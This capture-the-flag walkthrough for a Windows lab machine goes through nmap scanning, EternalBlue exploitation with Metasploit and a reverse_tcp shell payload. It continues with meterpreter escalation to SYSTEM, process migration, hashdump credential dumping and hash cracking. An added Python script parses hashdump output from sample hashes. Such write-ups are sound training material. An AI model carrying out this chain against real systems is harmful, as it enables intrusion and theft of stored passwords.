Blue

Task 1 Recon

Scan the machine. (If you are unsure how to tackle this, I recommend checking out the Nmap room)

For this, I just used the syntax # nmap -p1-1000 -T4 -v -sV 10.10.97.125

How many ports are open with a port number under 1000?

Just count the returned ports under 1000.

What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

For this, I just ran search scanner/smb, and it came back with some options including eternalblue. I ran that scanner against the target, and it showed it as vulnerable.

Task 2 Gain Access

Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

For this, I just searched eternalblue, and it came up as option 0.

Show options and set the one required value. What is the name of this value? (All caps for submission)

This is pretty easy: just use show options and see which required value isn't set yet, then set it using set rhost (target IP).

Usually, it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:

set payload windows/x64/shell/reverse_tcp

With that done, run the exploit!

Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.

Task 3 Escalate

If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to a meterpreter shell in Metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

I opted to just search msfconsole using search post/meterpreter.

Select this (use MODULE_PATH). Show options, what option are we required to change?

Pretty easy again: just look for a setting that is required but has no value yet.

Set the required option, you may need to list all of the sessions to find your target here.

We can use sessions -i to see active sessions. Then just use set session 1.

Run! If this doesn’t work, try completing the exploit from the previous task once more.

Once the meterpreter shell conversion completes, select that session for use.

To do this, you’ll need to see what new session was started, so use sessions -I, then select it using sessions -i (session number).

Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command ‘shell’ and run ‘whoami’. This should return that we are indeed a system. Background this shell afterward and select our meterpreter session for usage again.

List all of the processes running via the ‘ps’ command. Just because we are a system doesn’t mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).

Migrate to this process using the ‘migrate PROCESS_ID’ command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.

Task 4 Cracking

Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges. What is the name of the non-default user?

Just using hashdump returns a few hashes; just look through it.
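To pick the non-default account out of hashdump’s output without eyeballing it, here is an added Python example (not part of the original write-up or of Metasploit) that parses the pwdump-style lines hashdump prints and classifies accounts by RID, since built-in Windows accounts sit below RID 1000 and user-created accounts start at 1000; the sample lines and hash values are constructed.

```python
import re

# Well-known hashes of an empty password (public constants, not from the page).
# The LM value also appears when no LM hash is stored at all, so only the NT
# value is used as evidence of a blank password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Built-in accounts (Administrator 500, Guest 501, ...) occupy RIDs below 1000;
# accounts created after installation start at RID 1000.
BUILTIN_RID_MAX = 999

# Constructed sample in the format hashdump emits: user:RID:LM:NT:::
# The hash values are made up; only the layout matters here.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
alice:1001:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
"""

HASH_RE = re.compile(r"^[0-9a-f]{32}$")


def parse_hashdump(text):
    """Parse pwdump-style lines into dicts; lines that don't fit the format are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if not rid.isdigit() or not (HASH_RE.match(lm) and HASH_RE.match(nt)):
            continue
        records.append({"user": user, "rid": int(rid), "lm": lm, "nt": nt})
    return records


def non_default_users(records):
    """Accounts created after install: RID 1000 and above."""
    return [r["user"] for r in records if r["rid"] > BUILTIN_RID_MAX]


def blank_password_users(records):
    """Audit finding: accounts whose NT hash is the hash of an empty password."""
    return [r["user"] for r in records if r["nt"] == EMPTY_NT]


if __name__ == "__main__":
    recs = parse_hashdump(SAMPLE_HASHDUMP)
    print("non-default accounts:", non_default_users(recs))
    print("blank-password accounts:", blank_password_users(recs))
```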

Copy this password hash to a file and research how to crack it. What is the cracked password?

I opted to go fast and just use crackstation.net for this.

Task 5 Find flags!

Flag1? This flag can be found at the system root.

I didn’t get too crazy with this; I just went back into the Windows shell we got, went to C:, and then used type flag.txt to get the flag.

Flag2? This flag can be found at the location where passwords are stored within Windows.

For this, all we need to do is navigate to C:\Windows\System32\config, and it’s right there.

*Errata: Windows really doesn’t like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This is relatively rare; however, it can happen.

Flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

I wasn’t sure where to start, but I knew that in the meterpreter shell I could invoke a search command for files. With this knowledge, and knowing that the previous flag was flag2.txt, I deduced it would be flag3.txt, so I used search -f flag3.txt and found the file in the Documents folder of John.